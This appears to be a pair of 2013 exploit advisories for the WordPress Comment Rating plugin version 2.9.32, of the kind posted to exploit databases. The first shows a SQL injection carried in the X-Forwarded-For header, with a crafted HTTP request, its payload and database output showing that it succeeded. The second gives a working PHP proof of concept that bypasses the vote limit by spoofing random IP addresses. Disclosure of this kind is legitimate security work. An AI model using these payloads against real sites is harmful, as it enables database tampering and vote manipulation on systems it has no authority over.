1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 |
# Exploit Title: WordPress plugin: Comment Rating SQL injection # Google Dork: # Date: 21/02/2013 # Exploit Author: ebanyu # Url Author: www.ebanyu.com.ar # Vendor Homepage: wealthynetizen.com # Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/ # Version: 2.9.32 # Tested on: Fedora 18 + mysql 5.5 + php 5.4 Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php First take the IP from HTTP_X_FORWARDED_FOR header. ----------------------------------------------------------------------- 48 $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR"); 49 if(strstr($row['ck_ips'], $ip)) { 50// die('error|You have already voted on this item!'); 51// Just don't count duplicated votes 52$duplicated = 1; 53$ck_ips = $row['ck_ips']; 54 } Later made a UPDATE without filter the input. ------------------------------------------------------------------------ 77 $query = "UPDATE <code>$table_name</code> SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips. "' WHERE ck_comment_id = $k_id"; So let's take a look in the DB mysql> select * from wp_comment_rating; +---------------+----------------+--------------+----------------+ | ck_comment_id | ck_ips | ck_rating_up | ck_rating_down | +---------------+----------------+--------------+----------------+ | 2 | ,20.209.10.130 |1 |0 | | 3 ||0 |0 | +---------------+----------------+--------------+----------------+ 2 rows in set (0.00 sec) Now made a HTTP request with a injection in the HTTP_X_FORWARDED_FOR header: GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1 Host: 192.168.1.10 Accept-Encoding: gzip, deflate X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2# Connection: keep-alive And the result is: mysql> select * from wp_comment_rating; +---------------+---------------------+--------------+----------------+ | ck_comment_id | ck_ips| ck_rating_up | ck_rating_down | +---------------+---------------------+--------------+----------------+ | 2 | wordpress@localhost |2 |0 | | 3 | |0 |0 | +---------------+---------------------+--------------+----------------+ 2 rows in set (0.00 sec) Cheers ======================================================================================= # Exploit Title: WordPress plugin: Comment Rating Bypass vote limitation # Date: 21/02/2013 # Exploit Author: ebanyu # Url Author: www.ebanyu.com.ar # Vendor Homepage: wealthynetizen.com # Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/ # Version: 2.9.32 # Tested on: Fedora 18 + mysql 5.5 + php 5.4 Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php First take the IP from HTTP_X_FORWARDED_FOR header. ----------------------------------------------------------------------- 48 $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR"); 49 if(strstr($row['ck_ips'], $ip)) { 50// die('error|You have already voted on this item!'); 51// Just don't count duplicated votes 52$duplicated = 1; 53$ck_ips = $row['ck_ips']; 54 } Later made a UPDATE without filter the input. ------------------------------------------------------------------------ 77 $query = "UPDATE <code>$table_name</code> SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips. "' WHERE ck_comment_id = $k_id"; Now for bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it once per request. A simple POC is made in php. <?PHP define('HOST','http://localhost/wordpress/'); define('IDCOMMENT',2); $url=parse_url(HOST); define('URL',$url['path'].'wp-content/plugins/comment-rating/ck-processkarma.php?id='.IDCOMMENT.'&action=add&path=a&imgIndex=1_14_'); for($i=0;$i<1;$i++) lvlup(); function lvlup(){ global $url; $header = "GET ".URL." HTTP/1.1 \r\n"; $header.= "Host: ".$url['host']."\r\n"; $header.= "Accept-Encoding: gzip, deflate \r\n"; $header.= "X-Forwarded-For: ".long2ip(rand(0, "4294967295"))."\r\n"; $header.= "Connection: close \r\n\r\n"; $socket= socket_create(AF_INET, SOCK_STREAM,SOL_TCP); socket_connect($socket,$url['host'], 80); socket_write($socket, $header); socket_close($socket); } ?> |